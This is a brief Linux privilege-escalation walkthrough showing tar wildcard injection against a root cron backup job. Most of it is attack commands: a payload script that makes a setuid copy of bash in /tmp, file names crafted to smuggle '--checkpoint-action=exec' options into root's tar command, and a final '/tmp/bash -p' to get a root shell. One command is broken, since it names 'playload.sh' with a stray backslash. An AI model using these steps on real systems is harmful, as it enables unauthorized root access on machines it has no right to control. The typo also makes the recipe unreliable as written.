Linux privilege escalation with tar

---

It is possible to raise these privileges with the tar command and the use of wildcard. Typically with a cron executed with the root user.

 

cron

*/1 *   * * *   root tar -zcf /var/backups/home-john.tgz /home/john/*

 

Exploitation

echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > /home/john/payload.sh
chmod +x /home/john/payload.sh
touch /home/john/--checkpoint=1
touch /home/john/--checkpoint-action=exec=sh\playload.sh

 

Escalation

/tmp/bash -p